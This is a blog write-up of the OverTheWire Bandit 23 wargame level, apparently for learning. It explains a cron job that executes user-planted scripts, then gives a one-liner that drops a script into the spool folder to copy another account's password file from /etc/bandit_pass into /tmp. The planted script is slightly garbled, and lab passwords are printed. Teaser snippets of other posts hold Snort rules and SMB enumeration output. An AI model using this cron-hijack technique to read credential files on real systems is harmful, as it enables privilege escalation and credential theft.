Skip to main content

Bandit 23 Over The Wire

Lessons Learned

understanding more complicated bash scripts and writing bash scripts to take advantage of automated processes

Logging in

On a kali vm/ linux machine

Type:

ssh bandit23@bandit.labs.overthewire.org -p 2220
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n 

Completing The Challenge

The Goal:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

The Solution:

bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

What it does:

myname = bandit24(whoami in a job set to run by bandit24)

cd /var/spool/bandit24

echo "Executing and deleting all scripts in /var/spool/bandit24"

for all files that can be called by " ."

    if not file is "." current folder and if not file is ".." previous folder

        then echo "Handling 'File'"

        owner = use the stat cmd to get information from the file "$i" and only return the user name of the         owner

        if the owner of the file is "bandit23"

             timeout send signal the number 9 which in the notes it says is kill, though to see other possible signals you can check "kill -l" as mentioned in the man page of timeout.

            the results of "kill -l" is 

bandit23@bandit:~$ kill -l
 1) SIGHUP       2) SIGINT       3) SIGQUIT      4) SIGILL       5) SIGTRAP
 6) SIGABRT      7) SIGBUS       8) SIGFPE       9) SIGKILL     10) SIGUSR1
11) SIGSEGV     12) SIGUSR2     13) SIGPIPE     14) SIGALRM     15) SIGTERM
16) SIGSTKFLT   17) SIGCHLD     18) SIGCONT     19) SIGSTOP     20) SIGTSTP
21) SIGTTIN     22) SIGTTOU     23) SIGURG      24) SIGXCPU     25) SIGXFSZ
26) SIGVTALRM   27) SIGPROF     28) SIGWINCH    29) SIGIO       30) SIGPWR
31) SIGSYS      34) SIGRTMIN    35) SIGRTMIN+1  36) SIGRTMIN+2  37) SIGRTMIN+3
38) SIGRTMIN+4  39) SIGRTMIN+5  40) SIGRTMIN+6  41) SIGRTMIN+7  42) SIGRTMIN+8
43) SIGRTMIN+9  44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13
48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-12
53) SIGRTMAX-11 54) SIGRTMAX-10 55) SIGRTMAX-9  56) SIGRTMAX-8  57) SIGRTMAX-7
58) SIGRTMAX-6  59) SIGRTMAX-5  60) SIGRTMAX-4  61) SIGRTMAX-3  62) SIGRTMAX-2
63) SIGRTMAX-1  64) SIGRTMAX

            to conclude the timeout line: if the file run here is owned by bandit23 then it will be run, but set to timeout after a minute. This might enable other users to have persistance, but over the wire asks us tonot keep uneeded processes  running and they set up a pretty simple cleanup for all scripts done in this challenge.

            granted its  also possible they have certain group/file permission set up to only allow bandit23 and bandit24 to write to the folder, im uncertain of ways to test this withou sudo or changing to a different user neither of which i will do now.

    finally the script concludes by forcing a delete of the file it just used.

 Here we can easily replicate the code from the last challenge. 

So create a file in /var/spool/bandit24 and populate it with something like the following

touch /var/spool/bandit24/yesboi; printf "#\!/bin/bash\nchmod 644\n/tmp/trhhvfhifuighvuyitg\ncat /etc/bandit_pass/bandit24 > /tmp/trhhvfhifuighvuyitg" > /var/spool/bandit24/yesboi; chmod +x /var/spool/bandit24/yesboi


As shown below

bandit23@bandit:~$ touch /var/spool/bandit24/yesboi; printf "#\!/bin/bash\nchmod 644\n/tmp/trhhvfhifuighvuyitg\ncat /etc/bandit_pass/bandit24 > /tmp/trhhvfhifuighvuyitg" > /var/spool/bandit24/yesboi; chmod +x /var/spool/bandit24/yesboi

bandit23@bandit:~$ cat /var/spool/bandit24/yesboi

#\!/bin/bash

chmod 644

/tmp/trhhvfhifuighvuyitg

cat /etc/bandit_pass/bandit24 > /tmp/trhhvfhifuighvuyitgbandit23@bandit:~$ cat /var/spool/bandit24/yesboi

cat: /var/spool/bandit24/yesboi: No such file or directory

bandit23@bandit:~$ cat /tmp/trhhvfhifuighvuyitg UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

I use a one liner to create the file, write to it and make it executable. The file uses printf for reliable new lines. And a backslash is added to ! Since that is a special character that result in a looking for event error. Which seems to be a bash feature that for history substitution. 

Labels:

Comments

Post a Comment

Popular posts from this blog

Snort Challenge - The Basics

Rules Ive Used # This file intentionally does not come with signatures.  Put your local # additions here. # alert icmp any any <> any any (msg: "IP ID 35369 Found"; id:35369; sid: 1000001; rev:1) # log tcp any any <> any any (msg: "ALL SYN FLAGS"; flags:S;  sid: 1000001; rev:1;) # log tcp any any <> any any (msg: "ALL SYN FLAGS"; flags:P,A;  sid: 1000001; rev:1;) # log ip any any <> any any (msg: "SAME-IP IN IP"; sameip; sid:1000001; rev:1;)#This was not used in the first snort, they only wanted the next 2 rules, which showed less dups log udp any any <> any any (msg: "SAME-IP IN TCP"; sameip; sid:1000001; rev:1;) log tcp any any <> any any (msg: "SAME-IP IN UDP"; sameip; sid:1000002; rev:1;)  Snort Params: Some Sniffer mode parameters are explained in the table below; Parameter Description -v Verbose. Display the TCP/IP output in the console. -d Display the packet data (payload). -e Display...
Post a Comment
Read more

Network Services

Network Services https://tryhackme.com/room/networkservices 3. Enumerating SMB Conduct an nmap scan of your choosing, How many ports are open? running nmap 10.10.197.190 results in PORT STATE SERVICE 22/tcp open ssh 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 02:21:CD:94:98:F5 (Unknown) Show/Hide What ports is SMB running on? 139/445 Show/Hide this is the known default values for SMB Let's get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name? WORKGROUP Show/Hide looking at the rest of the info from enum4linux -a 10.10.197.190 ill summarize here ========================== | Target Information | ========================== Target ........... 10.10.197.190 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none =================================================...
Post a Comment
Read more

Bandit 11 Over The Wire

 Lessons Learned using cyberchef for things like rot13 Logging in On a kali vm/ linux machine Type: ssh bandit11@bandit.labs.overthewire.org -p 2220  IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR Completing The Challenge The Goal: The password for the next level is stored in the file data.txt , where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions The Solution: bandit11@bandit:~$ cat data.txt Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh   The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu This is known as rot13 and many free websites exist to solve this issue. CyberChef is a very good site/tool for this and can be downloaded
Post a Comment
Read more